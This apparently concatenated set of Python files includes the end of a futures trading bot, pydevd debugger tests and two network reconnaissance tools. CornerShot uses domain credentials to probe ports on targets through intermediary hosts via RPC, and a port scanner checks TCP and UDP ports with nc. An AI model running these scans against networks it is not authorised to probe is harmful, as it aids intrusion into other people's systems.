                                cnt_order = sig.counter_order()
                                order = client.new_order(symbol=symbol, side=cnt_order['side'], orderType='MARKET', quantity=cnt_order['amt'], positionSide=sig.positionSide) #, timeInForce=cnt_order['TIF'], price=lim)
                                sig.set_cnt_ordered(cntorderId=order['orderId'], cntType='MARKET', cntTime=order['updateTime'])
                                print_('\tPlaced COUNTER order: \n\t' + str(sig) + '\n\t' + orderstr(order), fileout)
                        elif sig.is_cnt_ordered():
                            ### Set CLOSED position here ###
                            in_position = True
                            order_update = client.query_order(symbol, sig.cntorderId)
                            if order_update['status'] == 'FILLED':
                                sig.set_closed(clsTime=order_update['updateTime'], clsPrice=order_update['avgPrice'])
                                print_('\n\tClosed order: \n\t' + str(sig) + '\n\t' + orderstr(order_update), fileout)
                    if (not in_position) and (last_signal is not None):
                        ### Check for ENTRY and place NEW order here ###
                        sig = last_signal
                        if sig.orderType == 'MARKET':
                            order = client.new_order(symbol=symbol, side=sig.side, orderType=sig.orderType, quantity=sig.get_quantity(), positionSide=sig.positionSide)
                            sig.set_ordered(orderId=order['orderId'], orderTime=order['updateTime'], limitPrice=None)
                            print_('\n\tPlaced NEW order: \n\t' + str(sig) + '\n\t' + orderstr(order), fileout)
                        elif sig.orderType=='LIMIT':
                            bids, asks, lim = get_possible_price(model.marketData, sig.side)
                            order = client.new_order(symbol=symbol, side=sig.side, orderType=sig.orderType, quantity=sig.get_quantity(), positionSide=sig.positionSide, timeInForce='GTC', price=lim)
                            sig.set_ordered(orderId=order['orderId'], orderTime=order['updateTime'], limitPrice=lim)
                            print_('\n\tPlaced NEW order: \n\t' + str(sig) + '\n\t' + orderstr(order), fileout)
            # Session length reached: closing the socket ends run_forever().
            ws.close()

        t1 = threading.Thread(target=data_stream)
        t2 = threading.Thread(target=strategy)
        t3 = threading.Thread(target=book_manager)
        t1.start()
        t2.start()
        t3.start()

    def position_count(insIds, signal_list, side='BOTH'):
        '''
        Returns number of open positions
        '''
        count = 0
        for s in insIds:
            for sig in signal_list[s]:
                if sig.side==side or side=='BOTH':
                    if sig.is_ordered() or sig.is_active() or sig.is_cnt_ordered():
                        count += 1
        return count

    def in_possition_(signal_list, side='BOTH'):
        '''
        Check if there is any open positions
        '''
        in_pos = False
        for sig in signal_list:
            if sig.side==side or side=='BOTH':
                if sig.is_ordered() or sig.is_active() or sig.is_cnt_ordered():
                    in_pos = True
                    break
        return in_pos

    def get_possible_price(mk_data, side):
        '''
        Return a safe limit price available on the market
        '''
        mk_depth = mk_data.order_book(limit=5)
        bids = list(float(x[0]) for x in mk_depth['bids'])
        asks = list(float(x[0]) for x in mk_depth['asks'])
        # Midpoint of the two best levels on the relevant side of the book.
        lim = (side=='BUY')*(bids[0]+bids[1])/2 + (side=='SELL')*(asks[0]+asks[1])/2
        lim = round(lim, PRICEPRE[mk_data.symbol.upper()])
        return bids, asks, lim

    start_time = time.time()
    portfolio, client, testnet, stream, models, fileout = args
    insIds = portfolio.tradeIns
    # Shared, per-symbol state mutated by on_message and the worker threads.
    SymKlns = {}
    Signals = {}
    for symbol in insIds:
        SymKlns[symbol] = []
        Signals[symbol] = []
    listen_key = client.get_listen_key()
    ws = websocket.WebSocketApp(f'{client.wss_way}{listen_key}',
                                on_message=on_message,
                                on_error=on_error,
                                on_close=on_close)
    ws.on_open = on_open
    ws.run_forever()
    client.close_stream()
    print_('\n' + barstr('Close Opening Positions', length=100, space_size=5) + '\n', fileout)
    ### PROBLEM 2 Insert your code to close all positions here ###
    return Signals
cornershot.py | import queue
import threading
import time
from random import uniform,shuffle
from .shots import PORT_UNKNOWN,PORT_FILTERED,PORT_OPEN
from .shots.even import EVENShot
from .shots.even6 import EVEN6Shot
from .shots.rprn import RPRNShot
from .shots.rrp import RRPShot
from . import logger
MAX_QUEUE_SIZE = 5000
TARGET_PORTS = [135, 445, 3389, 5985, 5986]
DEFAULT_SHOTS = [EVENShot, RPRNShot, RRPShot, EVEN6Shot]
class CornerShot(object):
    """Coordinates "shots": port probes fired through intermediary hosts.

    Shots are queued to a pool of daemon worker threads and their results
    merged into a nested {destination: {target: {port: state}}} dict.
    """

    def __init__(self, username, password, domain, workers=250, shots=None):
        logger.debug(f'CS created with username: {username},domain:{domain},workers:{workers}')
        if shots is None:
            shots = DEFAULT_SHOTS
        self.shot_classes = shots
        self.username = username
        self.password = password
        self.domain = domain
        self.workers = workers
        self.bulletQ = queue.Queue()   # pending shots consumed by workers
        self.resultQ = queue.Queue()   # (dest, target, port, state) tuples
        self.runthreads = True
        self.results = {}
        self.shot_list = []
        self.total_shots = 0
        self.current_tasks = []
        self.skip_scanned = False
        self.already_scanned = []
        self.batch_scanned_event = None

    def _takeashot(self):
        """Worker loop: pull a shot off the queue, fire it, post the result."""
        while self.runthreads:
            res = None
            try:
                bullet = self.bulletQ.get(timeout=0.1)
                if bullet:
                    try:
                        res = bullet.shoot()
                    except TimeoutError:
                        logger.debug('Timeout error')
                    except Exception:
                        logger.debug('Unexpected exception during shot', exc_info=True)
                    finally:
                        self.bulletQ.task_done()
                        self.resultQ.put(res)
                else:
                    # Bug fix: this used to log unconditionally after every
                    # shot; it only makes sense when the queue yielded None.
                    logger.debug('Bullet is none!')
            except (queue.Empty, TimeoutError):
                # Normal when the queue is idle; kept at debug level.
                logger.debug('Exception during bullet load', exc_info=True)
            except Exception:
                logger.debug('Unexpected exception during bullet load', exc_info=True)

    def add_shots(self, destinations, targets, target_ports=None, destination_ports=None):
        """Queue shots for every destination x target x target_port combo."""
        if target_ports is None:
            target_ports = TARGET_PORTS
        self._shots_generator(destinations, targets, target_ports, destination_ports)

    def add_many_shot_pairs(self, carrier_target_pairs, target_ports=None, destination_ports=None):
        """Queue shots for explicit (carrier, target) pairs."""
        if target_ports is None:
            target_ports = TARGET_PORTS
        # Resolve the suitable shot classes once per port, not per pair.
        tport_shot_class = []
        for target_port in target_ports:
            tport_shot_class.append([target_port, self._get_suitable_shots(target_port, destination_ports)])
        added = 0
        for ct_pair in carrier_target_pairs:
            carrier = ct_pair[0]
            target = ct_pair[1]
            for tport_shot_class_pair in tport_shot_class:
                target_port = tport_shot_class_pair[0]
                for cls in tport_shot_class_pair[1]:
                    self.shot_list.append(cls(self.username, self.password, self.domain, carrier, target, target_port=target_port))
                    added += 1
        # Bug fix: previously incremented by len(self.shot_list), re-counting
        # shots already queued by earlier calls.
        self.total_shots += added

    def _shots_generator(self, destinations, targets, target_ports, destination_ports=None):
        # Expand the cartesian product into concrete shot instances.
        for destination in destinations:
            for target in targets:
                for target_port in target_ports:
                    for cls in self._get_suitable_shots(target_port, destination_ports):
                        self.shot_list.append(cls(self.username, self.password, self.domain, destination, target, target_port=target_port))

    def _merge_result(self, dest, target, tport, state):
        """Fold one shot result into self.results.

        Precedence: FILTERED sticks, UNKNOWN is always overwritten, and
        distinct concrete states are concatenated with '|'.
        """
        if self.skip_scanned and PORT_OPEN in state:
            if target not in self.already_scanned:
                self.already_scanned.append(target)
        if dest not in self.results:
            self.results[dest] = {}
        if target not in self.results[dest]:
            self.results[dest][target] = {}
        if tport not in self.results[dest][target]:
            self.results[dest][target][tport] = state
        elif PORT_UNKNOWN in self.results[dest][target][tport]:
            self.results[dest][target][tport] = state
        elif PORT_FILTERED in self.results[dest][target][tport]:
            pass
        elif PORT_FILTERED in state:
            self.results[dest][target][tport] = state
        elif PORT_UNKNOWN in state:
            pass
        elif state not in self.results[dest][target][tport]:
            self.results[dest][target][tport] += "|" + state

    def _get_next_tasks(self, remaining):
        """Pop up to *remaining* shots off shot_list and return them.

        With skip_scanned enabled, shots at targets already seen open are
        dropped (still consuming a slot, matching the original accounting).
        """
        new_tasks = []
        remaining = min(len(self.shot_list), remaining)
        if self.skip_scanned:
            iterated_shots = 0
            for bullet in self.shot_list:
                if remaining > 0:
                    if bullet.target not in self.already_scanned:
                        new_tasks.append(bullet)
                    else:
                        logger.info(f"Skipping {bullet.target}, already scanned...")
                        self.total_shots -= 1
                    iterated_shots += 1
                    remaining -= 1
                else:
                    break
            self.shot_list = self.shot_list[iterated_shots:]
        else:
            new_tasks = self.shot_list[0:remaining]
            # Bug fix: the tail slice started at remaining + 1, silently
            # dropping one queued shot per batch.
            self.shot_list = self.shot_list[remaining:]
        return new_tasks

    def _shots_manager(self):
        """Feed workers in batches and drain results until all shots finish."""
        remaining = min(self.workers, MAX_QUEUE_SIZE)
        shuffle(self.shot_list)
        self.total_shots = len(self.shot_list)
        while self.runthreads:
            self.current_tasks = self._get_next_tasks(remaining)
            remaining = remaining - len(self.current_tasks)
            for bt in self.current_tasks:
                self.bulletQ.put(bt)
            while True:
                try:
                    result = self.resultQ.get(timeout=5)
                    if result:
                        destination, target, target_port, state = result
                        self._merge_result(destination, target, target_port, state)
                    self.resultQ.task_done()
                    remaining += 1
                    self.total_shots -= 1
                    if self.total_shots % 500 == 0:
                        # Let non-blocking callers consume partial results.
                        self.batch_scanned_event.set()
                    if self.total_shots < 1:
                        self.runthreads = False
                except (TimeoutError, queue.Empty):
                    break
        self.total_shots = 0
        self.batch_scanned_event.set()

    def open_fire(self, blocking=True, skip_scanned=False):
        """Start worker threads and run the scan.

        Returns the results dict when *blocking*, otherwise an Event that is
        set after each 500-shot batch and on completion.
        """
        self.skip_scanned = skip_scanned
        self.total_shots = len(self.shot_list)
        self.workers = min(self.total_shots, self.workers)
        if self.total_shots > 0:
            for _ in range(self.workers):
                w = threading.Thread(target=self._takeashot, daemon=True)
                w.start()
        if blocking:
            self._shots_manager()
            return self.results
        else:
            main_thread = threading.Thread(target=self._shots_manager, daemon=True)
            main_thread.start()
            self.batch_scanned_event = threading.Event()
            return self.batch_scanned_event

    def read_results(self):
        # Snapshot of the merged results gathered so far.
        return self.results

    def remaining_shots(self):
        # Number of shots not yet completed.
        return self.total_shots

    def _get_suitable_shots(self, target_port, destination_port):
        """Return the shot classes able to probe *target_port* (optionally
        constrained to classes supporting *destination_port*)."""
        class_list = []
        for bc in self.shot_classes:
            if destination_port:
                if destination_port in bc.destination_port_range() and target_port in bc.target_port_range():
                    class_list.append(bc)
            elif target_port in bc.target_port_range():
                class_list.append(bc)
        return class_list
|
test_utilities.py | import threading
from _pydevd_bundle.pydevd_utils import convert_dap_log_message_to_expression
from tests_python.debug_constants import IS_PY26, IS_PY3K, TEST_GEVENT, IS_CPYTHON
import sys
from _pydevd_bundle.pydevd_constants import IS_WINDOWS, IS_PY2, IS_PYPY
import pytest
import os
import codecs
from _pydevd_bundle.pydevd_thread_lifecycle import pydevd_find_thread_by_id
def test_expression_to_evaluate():
    """_expression_to_evaluate strips common leading indentation so an
    indented selection can be evaluated; already-flush code is untouched."""
    from _pydevd_bundle.pydevd_vars import _expression_to_evaluate
    byte_cases = [
        (b'expr', b'expr'),
        (b' expr', b'expr'),
        (b'for a in b:\n foo', b'for a in b:\n foo'),
        (b' for a in b:\n foo', b'for a in b:\nfoo'),
        (b' for a in b:\nfoo', b' for a in b:\nfoo'),
        (b'\tfor a in b:\n\t\tfoo', b'for a in b:\n\tfoo'),
    ]
    for raw, expected in byte_cases:
        assert _expression_to_evaluate(raw) == expected
    if IS_PY2:
        # On Python 2 a unicode expression comes back utf-8 encoded with a BOM.
        assert _expression_to_evaluate(u' expr') == (codecs.BOM_UTF8 + b'expr')
    else:
        assert _expression_to_evaluate(u' expr') == u'expr'
        assert _expression_to_evaluate(u' for a in expr:\n pass') == u'for a in expr:\npass'
def test_is_main_thread():
    # Checks is_current_thread_main_thread() from both sides: pytest runs
    # this function on the main thread, and a spawned thread must report
    # that it is NOT the main thread.
    from _pydevd_bundle.pydevd_utils import is_current_thread_main_thread
    from _pydevd_bundle.pydevd_utils import dump_threads
    if not is_current_thread_main_thread():
        # Build a rich failure message, including a dump of all live
        # threads, before raising.
        error_msg = 'Current thread does not seem to be a main thread. Details:\n'
        current_thread = threading.current_thread()
        error_msg += 'Current thread: %s\n' % (current_thread,)
        if hasattr(threading, 'main_thread'):
            error_msg += 'Main thread found: %s\n' % (threading.main_thread(),)
        else:
            error_msg += 'Current main thread not instance of: %s (%s)' % (
                threading._MainThread, current_thread.__class__.__mro__,)
        try:
            # Py2/Py3 compatible StringIO import.
            from StringIO import StringIO
        except:
            from io import StringIO
        stream = StringIO()
        dump_threads(stream=stream)
        error_msg += '\n\n' + stream.getvalue()
        raise AssertionError(error_msg)

    class NonMainThread(threading.Thread):

        def run(self):
            # Record the check result so the main thread can assert on it.
            self.is_main_thread = is_current_thread_main_thread()

    non_main_thread = NonMainThread()
    non_main_thread.start()
    non_main_thread.join()
    assert not non_main_thread.is_main_thread
def test_find_thread():
    """pydevd_find_thread_by_id resolves known ids and returns None for
    unknown ones."""
    from _pydevd_bundle.pydevd_constants import get_current_thread_id
    # An id that matches no live thread resolves to None.
    assert pydevd_find_thread_by_id('123') is None
    cur = threading.current_thread()
    assert pydevd_find_thread_by_id(get_current_thread_id(cur)) is cur
def check_dap_log_message(log_message, expected, evaluated, eval_locals=None):
    """Assert that *log_message* converts to the *expected* expression and
    that evaluating it (with optional *eval_locals*) yields *evaluated*."""
    expr = convert_dap_log_message_to_expression(log_message)
    assert expr == expected
    assert eval(expr, eval_locals) == evaluated
    return expr
def test_convert_dap_log_message_to_expression():
    """Exercise DAP logpoint -> Python expression conversion on literal cases.

    Each check asserts both the generated expression text and the value that
    expression evaluates to (see check_dap_log_message).
    """
    # Plain message, no placeholders.
    assert check_dap_log_message(
        'a',
        "'a'",
        'a',
    )
    # {name} placeholders become %s args evaluated against locals.
    assert check_dap_log_message(
        'a {a}',
        "'a %s' % (a,)",
        'a value',
        {'a': 'value'}
    )
    assert check_dap_log_message(
        'a {1}',
        "'a %s' % (1,)",
        'a 1'
    )
    # Whitespace-only braces are dropped entirely.
    assert check_dap_log_message(
        'a { }',
        "'a '",
        'a '
    )
    assert check_dap_log_message(
        'a {1} {2}',
        "'a %s %s' % (1, 2,)",
        'a 1 2',
    )
    # Nested braces: the outer pair delimits the expression ({22:22} dict).
    assert check_dap_log_message(
        'a {{22:22}} {2}',
        "'a %s %s' % ({22:22}, 2,)",
        'a {22: 22} 2'
    )
    # A stray closing brace outside an expression is kept verbatim.
    assert check_dap_log_message(
        'a {(22,33)}} {2}',
        "'a %s} %s' % ((22,33), 2,)",
        'a (22, 33)} 2'
    )
    if not IS_PY26:
        # Note: set literal not valid for Python 2.6.
        assert check_dap_log_message(
            'a {{1: {1}}}',
            "'a %s' % ({1: {1}},)",
            'a {1: {1}}' if IS_PY3K else 'a {1: set([1])}',
        )

    # Error condition.
    assert check_dap_log_message(
        'a {{22:22} {2}',
        "'Unbalanced braces in: a {{22:22} {2}'",
        'Unbalanced braces in: a {{22:22} {2}'
    )
def test_pydevd_log():
    """pydev_log: messages are filtered by debug level and bad format strings degrade gracefully."""
    from _pydev_bundle import pydev_log
    try:
        import StringIO as io  # Python 2.
    except:
        import io  # Python 3.
    from _pydev_bundle.pydev_log import log_context

    # Level 0: only critical messages pass.
    stream = io.StringIO()
    with log_context(0, stream=stream):
        pydev_log.critical('always')
        pydev_log.info('never')
    assert stream.getvalue() == 'always\n'

    # Level 1: info messages pass too.
    stream = io.StringIO()
    with log_context(1, stream=stream):
        pydev_log.critical('always')
        pydev_log.info('this too')
    assert stream.getvalue() == 'always\nthis too\n'

    # %-style arguments are applied lazily.
    stream = io.StringIO()
    with log_context(0, stream=stream):
        pydev_log.critical('always %s', 1)
    assert stream.getvalue() == 'always 1\n'

    stream = io.StringIO()
    with log_context(0, stream=stream):
        pydev_log.critical('always %s %s', 1, 2)
    assert stream.getvalue() == 'always 1 2\n'

    stream = io.StringIO()
    with log_context(0, stream=stream):
        pydev_log.critical('always %s %s', 1)
    # Even if there's an error in the formatting, don't fail, just print the message and args.
    assert stream.getvalue() == 'always %s %s - (1,)\n'

    # exception() logs the message plus the current traceback.
    stream = io.StringIO()
    with log_context(0, stream=stream):
        try:
            raise RuntimeError()
        except:
            pydev_log.exception('foo')

        assert 'foo\n' in stream.getvalue()
        assert 'raise RuntimeError()' in stream.getvalue()

    stream = io.StringIO()
    with log_context(0, stream=stream):
        pydev_log.error_once('always %s %s', 1)
    # Even if there's an error in the formatting, don't fail, just print the message and args.
    assert stream.getvalue() == 'always %s %s - (1,)\n'
def test_pydevd_logging_files(tmpdir):
    """initialize_debug_stream creates a pid-suffixed log file in the configured directory."""
    from _pydev_bundle import pydev_log
    from _pydevd_bundle.pydevd_constants import DebugInfoHolder
    import os.path
    from _pydev_bundle.pydev_log import _LoggingGlobals
    try:
        import StringIO as io  # Python 2.
    except:
        import io  # Python 3.
    from _pydev_bundle.pydev_log import log_context

    stream = io.StringIO()
    with log_context(0, stream=stream):
        d1 = str(tmpdir.join('d1'))
        d2 = str(tmpdir.join('d2'))

        for d in (d1, d2):
            DebugInfoHolder.PYDEVD_DEBUG_FILE = os.path.join(d, 'file.txt')
            pydev_log.initialize_debug_stream(reinitialize=True)

            # 'file.txt' gets rewritten to 'file.<pid>.txt' so multiple
            # processes don't clobber each other's logs.
            assert os.path.normpath(_LoggingGlobals._debug_stream_filename) == \
                os.path.normpath(os.path.join(d, 'file.%s.txt' % os.getpid()))

            assert os.path.exists(_LoggingGlobals._debug_stream_filename)

            assert pydev_log.list_log_files(DebugInfoHolder.PYDEVD_DEBUG_FILE) == [
                _LoggingGlobals._debug_stream_filename]
def _check_tracing_other_threads():
    """Check that set_trace_to_threads installs a trace function on running threads.

    Meant to run in a subprocess (see test_tracing_other_threads): it spawns a
    threading.Thread and a raw _thread, installs a tracing function on them via
    pydevd_tracing, and waits until both threads observe it through sys.gettrace().
    """
    import pydevd_tracing
    import time
    from tests_python.debugger_unittest import wait_for_condition
    try:
        import _thread  # Python 3.
    except ImportError:
        import thread as _thread  # Python 2.

    # This method is called in a subprocess, so, make sure we exit properly even if we somehow
    # deadlock somewhere else.
    def dump_threads_and_kill_on_timeout():
        time.sleep(10)
        from _pydevd_bundle import pydevd_utils
        pydevd_utils.dump_threads()
        time.sleep(1)
        import os
        os._exit(77)

    _thread.start_new_thread(dump_threads_and_kill_on_timeout, ())

    def method():
        # Busy-wait until a trace function is installed for this thread, then
        # record it so the main thread can verify it's ours.
        while True:
            trace_func = sys.gettrace()
            if trace_func:
                threading.current_thread().trace_func = trace_func
                break
            time.sleep(.01)

    def dummy_thread_method():
        threads.append(threading.current_thread())
        method()

    threads = []
    threads.append(threading.Thread(target=method))
    threads[-1].daemon = True
    threads[-1].start()
    _thread.start_new_thread(dummy_thread_method, ())

    # Wait until the raw _thread registered itself in `threads` too.
    wait_for_condition(lambda: len(threads) == 2, msg=lambda:'Found threads: %s' % (threads,))

    def tracing_func(frame, event, args):
        return tracing_func

    # Expected to return 0 (the asserted success value of set_trace_to_threads).
    assert pydevd_tracing.set_trace_to_threads(tracing_func) == 0

    def check_threads_tracing_func():
        for t in threads:
            if getattr(t, 'trace_func', None) != tracing_func:
                return False
        return True

    wait_for_condition(check_threads_tracing_func)

    # The main thread's own trace function must have been set as well.
    assert tracing_func == sys.gettrace()
def _build_launch_env():
    """Return (cwd, environ) suitable for launching test subprocesses.

    PYTHONPATH is extended so the child can import this test module, the
    pydevd test resources, the attach-to-process helpers and pydevd itself.
    """
    import os
    import pydevd

    environ = os.environ.copy()
    cwd = os.path.abspath(os.path.dirname(__file__))
    assert os.path.isdir(cwd)

    pydevd_dir = os.path.dirname(pydevd.__file__)
    resources_dir = os.path.join(pydevd_dir, 'tests_python', 'resources')
    attach_to_process_dir = os.path.join(pydevd_dir, 'pydevd_attach_to_process')
    for required_dir in (resources_dir, attach_to_process_dir, pydevd_dir):
        assert os.path.isdir(required_dir)

    environ['PYTHONPATH'] = os.pathsep.join([
        cwd,
        resources_dir,
        attach_to_process_dir,
        pydevd_dir,
        environ.get('PYTHONPATH', ''),
    ])
    return cwd, environ
def _check_in_separate_process(method_name, module_name='test_utilities', update_env=None):
    """Run ``module_name.method_name()`` in a fresh interpreter; raise if it fails.

    update_env: optional mapping with extra environment variables for the child.

    Fix: the previous signature used a mutable default argument (``update_env={}``);
    ``None`` avoids the shared-mutable-default pitfall with identical behavior.
    """
    import subprocess

    cwd, environ = _build_launch_env()
    if update_env:
        environ.update(update_env)

    subprocess.check_call(
        [sys.executable, '-c', 'import %(module_name)s;%(module_name)s.%(method_name)s()' % dict(
            method_name=method_name, module_name=module_name)],
        env=environ,
        cwd=cwd
    )
@pytest.mark.skipif(not IS_CPYTHON, reason='Functionality to trace other threads requires CPython.')
def test_tracing_other_threads():
    """Drive _check_tracing_other_threads in an isolated interpreter."""
    # Note: run this test in a separate process so that it doesn't mess with any current tracing
    # in our current process.
    _check_in_separate_process('_check_tracing_other_threads')
@pytest.mark.skipif(not IS_CPYTHON, reason='Functionality to trace other threads requires CPython.')
def test_find_main_thread_id():
    """Run the main-thread-id discovery checks in several launch configurations."""
    # Note: run the checks below in a separate process because they rely heavily on what's available
    # in the env (such as threads or having threading imported).
    _check_in_separate_process('check_main_thread_id_simple', '_pydevd_test_find_main_thread_id')
    _check_in_separate_process('check_main_thread_id_multiple_threads', '_pydevd_test_find_main_thread_id')
    _check_in_separate_process('check_win_threads', '_pydevd_test_find_main_thread_id')
    _check_in_separate_process('check_fix_main_thread_id_multiple_threads', '_pydevd_test_find_main_thread_id')

    import subprocess
    import pydevd
    cwd, environ = _build_launch_env()

    # Also check launching the module with `-m` ...
    subprocess.check_call(
        [sys.executable, '-m', '_pydevd_test_find_main_thread_id'],
        env=environ,
        cwd=cwd
    )

    # ... and running the file directly by path.
    resources_dir = os.path.join(os.path.dirname(pydevd.__file__), 'tests_python', 'resources')

    subprocess.check_call(
        [sys.executable, os.path.join(resources_dir, '_pydevd_test_find_main_thread_id.py') ],
        env=environ,
        cwd=cwd
    )
@pytest.mark.skipif(not IS_WINDOWS, reason='Windows-only test.')
def test_get_ppid():
    """The internal Windows parent-pid lookup agrees with os.getppid (Python 3)."""
    from _pydevd_bundle.pydevd_api import PyDevdAPI

    windows_ppid = PyDevdAPI()._get_windows_ppid()
    if IS_PY3K:
        # On python 3 we can check that our internal api which is used for Python 2 gives the
        # same result as os.getppid.
        assert windows_ppid == os.getppid()
    else:
        # Python 2 on Windows has no os.getppid oracle; just check a value was found.
        assert windows_ppid is not None
def _check_gevent(expect_msg):
    """Check notify_about_gevent_if_needed before and after monkey-patching.

    expect_msg: the expected return value once gevent.monkey.patch_all() ran
    (driven by the GEVENT_SUPPORT env var set by the caller). Must run in a
    subprocess since importing/patching gevent cannot be undone.
    """
    from _pydevd_bundle.pydevd_utils import notify_about_gevent_if_needed
    # Merely importing gevent must not trigger the notification...
    assert not notify_about_gevent_if_needed()
    import gevent
    assert not notify_about_gevent_if_needed()
    import gevent.monkey
    assert not notify_about_gevent_if_needed()
    # ...only monkey-patching does.
    gevent.monkey.patch_all()
    assert notify_about_gevent_if_needed() == expect_msg
def check_notify_on_gevent_loaded():
    # Run in a subprocess without GEVENT_SUPPORT: the user should be notified.
    _check_gevent(True)
def check_dont_notify_on_gevent_loaded():
    # Run in a subprocess with GEVENT_SUPPORT set: no notification expected.
    _check_gevent(False)
@pytest.mark.skipif(not TEST_GEVENT, reason='Gevent not installed.')
def test_gevent_notify():
    """The gevent notification depends on the GEVENT_SUPPORT environment variable."""
    _check_in_separate_process('check_notify_on_gevent_loaded', update_env={'GEVENT_SUPPORT': ''})
    _check_in_separate_process('check_dont_notify_on_gevent_loaded', update_env={'GEVENT_SUPPORT': 'True'})
def test_interrupt_main_thread():
    """interrupt_main_thread must raise KeyboardInterrupt in the main thread promptly."""
    from _pydevd_bundle.pydevd_utils import interrupt_main_thread
    import time
    main_thread = threading.current_thread()

    def interrupt():
        # sleep here so that the main thread in the test can get to the sleep too (otherwise
        # if we interrupt too fast we won't really check that the sleep itself
        # got interrupted -- although if that happens on some tests runs it's
        # not really an issue either).
        time.sleep(1)
        interrupt_main_thread(main_thread)

    if IS_PYPY:
        # On PyPy a time.sleep() is not being properly interrupted,
        # so, let's just check that it throws the KeyboardInterrupt in the
        # next instruction.
        timeout = 2
    else:
        timeout = 20
    initial_time = time.time()
    try:
        t = threading.Thread(target=interrupt)
        t.start()
        time.sleep(timeout)
    except KeyboardInterrupt:
        if not IS_PYPY:
            actual_timeout = time.time() - initial_time
            # If this fails it means that although we interrupted Python actually waited for the next
            # instruction to send the event and didn't really interrupt the thread.
            assert actual_timeout < timeout, 'Expected the actual timeout (%s) to be < than the timeout (%s)' % (
                actual_timeout, timeout)
    else:
        raise AssertionError('KeyboardInterrupt not generated in main thread.')
|
port-sniffer.py | import os
import re
import sys
import time
import socket
import datetime
import argparse
import termcolor
import threading
import concurrent.futures
# Command-line interface. Bug fix: the valid TCP/UDP port maximum is 65535,
# not 65353 (a digit swap) -- corrected in the -e default and in the -s/-e
# help texts (which also wrongly said "ips" instead of ports).
parser = argparse.ArgumentParser(
    description="Check if hosts are up.",
    formatter_class=lambda prog: argparse.HelpFormatter(
        prog, max_help_position=150, width=150
    ),
)
parser.add_argument(
    "-i",
    "--interval",
    help="The interval in minutes between checks (default 5)",
    default=5,
    type=int,
)
parser.add_argument(
    "-r",
    "--retry",
    help="The retry count when a connection fails (default 3)",
    default=3,
    type=int,
)
parser.add_argument(
    "-d",
    "--delay",
    help="The retry delay in seconds when a connection fails (default 10)",
    default=10,
    type=int,
)
parser.add_argument(
    "-t",
    "--timeout",
    help="The connection timeout in seconds (default 3)",
    default=3,
    type=int,
)
parser.add_argument(
    "-s", "--start", help="The port range start (default 0)", default=0, type=int
)
parser.add_argument(
    "-e", "--end", help="The port range end (default 65535)", default=65535, type=int
)
parser.add_argument(
    "-H",
    "--hosts",
    nargs="+",
    help="The host to monitor Format: '<server>:tcp <server>:udp' (default 127.0.0.1)",
    default=["127.0.0.1:tcp"],
)
parser.add_argument(
    "-c",
    "--connection",
    help="The connection type (default tcp) otherwise udp",
    default="tcp",
    type=str,
)
parser.add_argument(
    "-z",
    "--thread",
    help="The needed threads (default 5)",
    default=5,
    type=int,
)
parser.add_argument(
    "-x",
    "--allport",
    help="Scan all port(default 0)",
    default=0,
    type=int,
)
parser.add_argument(
    "-n",
    "--run",
    help="Run in all thread(default 0)",
    default=0,
    type=int,
)
args = parser.parse_args()
# Default well-known service ports scanned when --allport is not enabled.
ports = [
    20,
    21,
    22,
    23,
    25,
    53,
    80,
    110,
    119,
    123,
    143,
    161,
    194,
    443,
    465,
    587,
    993,
    995,
]
# Module-level configuration derived from the parsed command line.
hosts = args.hosts
retry = args.retry
delay = args.delay
timeout = args.timeout
start = args.start
end = args.end
interval = args.interval
connection_type = args.connection
# NOTE(review): `thread` is read as the executor worker count in run(), but a
# local `for thread in threads` loop there shadows it -- verify intent.
thread = args.thread
allport = args.allport == 1
# NOTE(review): this flag is shadowed by `def run():` below, so `if run:`
# inside run() sees the function object (always truthy) -- verify intent.
run = args.run == 1
def println(string, indent, color="white"):
    """Print *string* in *color*, prefixed with a bold blue timestamp.

    indent: number of spaces inserted between the timestamp and the message.
    """
    timestamp = "[" + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + "]"
    # Idiom fix: build the indent with string repetition instead of a
    # character-by-character accumulation loop.
    print(
        termcolor.colored(
            timestamp + " " * indent,
            "blue",
            attrs=["bold"],
        ),
        end=" ",
    )
    print(termcolor.colored(string, color), end="")
    print()
def tcpCheck(ip, port):
    """Return True when a TCP connection to ip:port succeeds within `timeout` seconds."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((ip, int(port)))
        s.shutdown(socket.SHUT_RDWR)
        return True
    except OSError:
        # Narrowed from a bare `except`: connection refusals and timeouts are
        # the expected failure mode (socket errors are OSError subclasses);
        # anything else (e.g. KeyboardInterrupt) should propagate.
        return False
    finally:
        s.close()
def udpCheck(ip, port):
    """Return True when `nc` reports the UDP port reachable (any output).

    Security fix: the previous implementation interpolated ip/port into a
    shell command executed via os.popen, allowing command injection through
    a crafted host string. Using subprocess with an argument list avoids the
    shell entirely while still capturing nc's combined stdout+stderr.
    """
    import subprocess
    try:
        res = subprocess.run(
            ["nc", "-vzu", "-w", str(timeout), ip, str(port)],
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
        )
    except OSError:
        # nc is not installed / not executable.
        return False
    # Mirrors the original contract: any output at all means "up".
    return res.stdout.decode(errors="replace") != ""
def checkHost(host):
    """Probe one host entry (dict with ip/port/conntype) up to `retry` times.

    Returns True as soon as a probe succeeds; prints a retry notice and sleeps
    `delay` seconds after each failed attempt. Returns False when every
    attempt failed.
    """
    # The udp and tcp branches previously duplicated the whole retry/report
    # logic; selecting the probe function once removes the duplication.
    probe = udpCheck if host["conntype"] == "udp" else tcpCheck
    for _ in range(retry):
        if probe(host["ip"], host["port"]):
            return True
        println(
            "No response from "
            + host["ip"]
            + ":"
            + str(host["port"])
            + ":"
            + host["conntype"]
            + ", retrying in "
            + str(delay)
            + "s...",
            0,
            "white",
        )
        time.sleep(delay)
    return False
def parseHost(host):
    """Check one host entry, update host["status"] in place, and print results.

    (Removed an unused `prestatus` local that captured the previous status but
    was never read.)
    """
    println(
        "Checking "
        + host["ip"]
        + ":"
        + str(host["port"])
        + ":"
        + host["conntype"]
        + "...",
        0,
        "magenta",
    )
    if checkHost(host):
        host["status"] = "up"
        color = "green"
    else:
        host["status"] = "down"
        color = "red"
    println(
        "Status of "
        + host["ip"]
        + ":"
        + str(host["port"])
        + ":"
        + host["conntype"]
        + ": "
        + host["status"],
        0,
        color,
    )
    time.sleep(1)
def run():
    """Build the scan list, then check every host forever, pausing `interval` minutes.

    Bug fixes relative to the original:
    - `if run:` tested this very function object (always truthy) because the
      module-level flag `run = args.run == 1` is shadowed by `def run():`;
      as a result the --run option and the --thread worker count were
